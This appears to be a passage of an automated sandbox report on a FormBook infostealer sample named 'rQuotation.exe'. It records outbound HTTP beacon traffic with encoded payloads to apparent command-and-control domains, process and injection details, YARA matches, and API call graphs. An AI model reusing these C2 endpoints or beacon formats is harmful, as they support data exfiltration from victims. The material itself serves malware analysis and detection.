Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Dec 23, 2024 04:10:07.867394924 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50024 | 185.68.108.243 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:10:09.257201910 CET | 10803 | OUT | POST /45u5/ HTTP/1.1
Host: www.accusolution.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.accusolution.pro
Referer: http://www.accusolution.pro/45u5/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10300
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:10:10.522846937 CET | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 23 Dec 2024 03:10:10 GMT
server: LiteSpeed
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Dec 23, 2024 04:10:10.522866011 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50030 | 185.68.108.243 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:10:11.907931089 CET | 427 | OUT | GET /45u5/?pRel=chN0&4v7=0TAGyGi/QqAief36fqQZkTt5+nwNOdjQfsW4ILLFJiz2YBVGcbvNqcBGTGc+pdHcbXHcTIwSr9BXUFYIju8DT0Mq2PAg2Di4D0yPeZ6V6HqzRoZnxJ6cd60= HTTP/1.1
Host: www.accusolution.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:10:13.179289103 CET | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 23 Dec 2024 03:10:12 GMT
server: LiteSpeed
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Dec 23, 2024 04:10:13.179306030 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 50031 | 52.223.13.41 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:10:19.468746901 CET | 695 | OUT | POST /zsuo/ HTTP/1.1
Host: www.seamarket.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.seamarket.shop
Referer: http://www.seamarket.shop/zsuo/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=VCIA8T096mSOn2z2vWLcjeS0MZsAZNkdcTLBx2aHnUUWcAplaGmZKegBFnpcvzin6nGFZFQrDFpQOcizxqpRS2VXwwbtySq72F0jEhekRdqsjiAQ7ANzHzmnlgoq5V7U8MRwfnK9+hda73jvzmYhFz3b3Kb8opbO70mLyTIpWVqr5ALtHGoGX39XNSVM05x5tA==
Dec 23, 2024 04:10:20.552644968 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 50032 | 52.223.13.41 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:10:22.130280972 CET | 715 | OUT | POST /zsuo/ HTTP/1.1
Host: www.seamarket.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.seamarket.shop
Referer: http://www.seamarket.shop/zsuo/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=VCIA8T096mSOmWj28hfcqeSzJZsATtkncTHBx1WpnmAWdktlbHmZNegBPHpdhTi56nKNZHUrDFtQOdSzwZBSSmVR4Qbv8yq72F0jEhKORdys/DwQpyp8ZjmktAoquF6f8MRofjDY+ila72zvz0gmMz3Z6qaF5oDH8FrI61IUbE/P4GG3W3JRF3ZkQVc456Mw2JgbMX0KVeDkVOElIflXQ04=
Dec 23, 2024 04:10:23.216377974 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 50033 | 52.223.13.41 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:10:24.788057089 CET | 10797 | OUT | POST /zsuo/ HTTP/1.1
Host: www.seamarket.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.seamarket.shop
Referer: http://www.seamarket.shop/zsuo/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10300
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Data Ascii: 4v7= [TRUNCATED]
Dec 23, 2024 04:10:25.875653982 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
32 | 192.168.2.4 | 50034 | 52.223.13.41 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:10:27.719974995 CET | 425 | OUT | GET /zsuo/?4v7=YAgg/ldayhOHmzfsjWLXvaG7J5REZu11MAD7iHXRrkYiTwNIRlKLNa8zNDpduzX56xW5NVkmDFlOQcyvict8ZBdH6DXl406L+zQHeArrLeiD5GII5G18dkg=&pRel=chN0 HTTP/1.1
Host: www.seamarket.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:10:28.813452005 CET | 370 | IN | HTTP/1.1 200 OK
content-type: text/html
date: Mon, 23 Dec 2024 03:10:28 GMT
content-length: 249
connection: close
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4v7=YAgg/ldayhOHmzfsjWLXvaG7J5REZu11MAD7iHXRrkYiTwNIRlKLNa8zNDpduzX56xW5NVkmDFlOQcyvict8ZBdH6DXl406L+zQHeArrLeiD5GII5G18dkg=&pRel=chN0"}</script></head></html>



                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:22:07:21
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\rQuotation.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\rQuotation.exe"
                                                                                                                                                                                                                                              Imagebase:0x840000
                                                                                                                                                                                                                                              File size:289'280 bytes
                                                                                                                                                                                                                                              MD5 hash:D5828DCADC44BCDB74450E5A47118E5E
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:22:07:43
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe"
                                                                                                                                                                                                                                              Imagebase:0xb90000
                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:22:07:45
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                                                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                                                                                              MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:22:07:57
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe"
                                                                                                                                                                                                                                              Imagebase:0xb90000
                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:22:08:09
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true


                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:1.1%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                                                                                                                                                Signature Coverage:13.4%
                                                                                                                                                                                                                                                Total number of Nodes:134
                                                                                                                                                                                                                                                Total number of Limit Nodes:8

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 75 857cb3-857ccf 76 857cd7-857cdc 75->76 77 857cd2 call 86f963 75->77 78 857ce2-857cf0 call 86ff63 76->78 79 857cde-857ce1 76->79 77->76 82 857d00-857d11 call 86e403 78->82 83 857cf2-857cfd call 870203 78->83 88 857d13-857d27 LdrLoadDll 82->88 89 857d2a-857d2d 82->89 83->82 88->89
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00857D25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                • Opcode ID: 57e48f437d241a639378227bd1e8ce3a1f23e3b9917681a0bd4417694f65be95
                                                                                                                                                                                                                                                • Instruction ID: 33efae34173839ef519cf255350c18d28eeb1db1a9d7aea1a332ba3e0299d422
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57e48f437d241a639378227bd1e8ce3a1f23e3b9917681a0bd4417694f65be95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89010CB5D0020DABDB10DAA4DC46FADB778EB54304F1081A5ED18D7241FA31EA198B92

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 108 86cc93-86cccf call 844623 call 86def3 NtClose
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0086CCCA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                • Opcode ID: f8d33248dd749a7e87692bc31110c87a906272626809aadd8f21c7f22df8aa87
                                                                                                                                                                                                                                                • Instruction ID: 28ce892a3c119f7d20a990e17fbb4ae77d621dea45da98508c360e1d541084cc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8d33248dd749a7e87692bc31110c87a906272626809aadd8f21c7f22df8aa87
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73E04632604304BBD220EA6EDC02F9B776CEFC6710F018419FA09AB242C7B1B91186A2

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 126 1702b60-1702b6c LdrInitializeThunk
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 002f0276833cfa497716172d34573b5ac96c60c6ab7050e437dc94e1099b2bb8
                                                                                                                                                                                                                                                • Instruction ID: 303c684bc625a8e30155136965f9a11d375cdd934296fd773830e69912d4ea8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 002f0276833cfa497716172d34573b5ac96c60c6ab7050e437dc94e1099b2bb8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14900262256400034305715C4414616900A97E1201B55C031E10145A0DC6258A916226
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 76697d5127d853aa67e1929212e28fc58df3fb53277eb54e78f8c7512ff9c705
                                                                                                                                                                                                                                                • Instruction ID: 2eee14576784d90666d29e4471d0251e91a2671cb37d16f1c13eb5aa82aa2606
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76697d5127d853aa67e1929212e28fc58df3fb53277eb54e78f8c7512ff9c705
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2290023225540413D311715C4504707500997D1241F95C422A0424568DD7568B52A222

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 127 1702c70-1702c7c LdrInitializeThunk
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: d07f7c2c80b48dcc8042bf82a2499aba5dc84a080d09d6c6c36b71f5ffa3445d
                                                                                                                                                                                                                                                • Instruction ID: df347039c994c2c61539318e00d401e06eaa9a61d124cafbdb757c560c0751d2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d07f7c2c80b48dcc8042bf82a2499aba5dc84a080d09d6c6c36b71f5ffa3445d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB90023225548803D310715C840474A500597D1301F59C421A4424668DC7958A917222
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 913da5868286b2f73ce337ee689448ef7a11d34c285dc6265886156caeee1080
                                                                                                                                                                                                                                                • Instruction ID: a63d35ad978c2bf2f20045124798b43f2fbf8723e7a9cbcc3f90025d936517a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 913da5868286b2f73ce337ee689448ef7a11d34c285dc6265886156caeee1080
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5690023265950403D300715C4514706600597D1201F65C421A0424578DC7958B5166A3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File

Control-flow Graph

APIs
• PostThreadMessageW.USER32(x5R95Rwl,00000111,00000000,00000000), ref: 0085455A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessagePostThread
• String ID: x5R95Rwl$x5R95Rwl
• API String ID: 1836367815-242397096

Control-flow Graph

control_flow_graph 21 8544d5-8544d7 22 854467-854475 21->22 23 8544d9-85454d call 86ee23 call 86f833 call 857cb3 call 8445d3 call 8653f3 21->23 24 854477 22->24 25 85445e-854475 22->25 40 85456d-854573 23->40 41 85454f-85455e PostThreadMessageW 23->41 27 854485-854496 24->27 28 854479-854483 24->28 25->24 25->25 28->27 41->40 42 854560-85456a 41->42 42->40
APIs
• PostThreadMessageW.USER32(x5R95Rwl,00000111,00000000,00000000), ref: 0085455A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessagePostThread
• String ID: x5R95Rwl$x5R95Rwl
• API String ID: 1836367815-242397096

Control-flow Graph

control_flow_graph 43 8544e3-8544f5 44 8544fd-85454d call 86f833 call 857cb3 call 8445d3 call 8653f3 43->44 45 8544f8 call 86ee23 43->45 54 85456d-854573 44->54 55 85454f-85455e PostThreadMessageW 44->55 45->44 55->54 56 854560-85456a 55->56 56->54
APIs
• PostThreadMessageW.USER32(x5R95Rwl,00000111,00000000,00000000), ref: 0085455A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessagePostThread
• String ID: x5R95Rwl$x5R95Rwl
• API String ID: 1836367815-242397096

Control-flow Graph

control_flow_graph 90 857d74-857d76 91 857d06-857d11 90->91 92 857d78-857d9d 90->92 93 857d13-857d27 LdrLoadDll 91->93 94 857d2a-857d2d 91->94 96 857d9f-857da4 92->96 97 857d28-857d29 92->97 93->94 97->94
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00857D25
Memory Dump Source
• Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0

Control-flow Graph

control_flow_graph 103 86d003-86d044 call 844623 call 86def3 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,E2C10750,00000007,00000000,00000004,00000000,00857534,000000F4), ref: 0086D03F
Memory Dump Source
• Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: FreeHeap
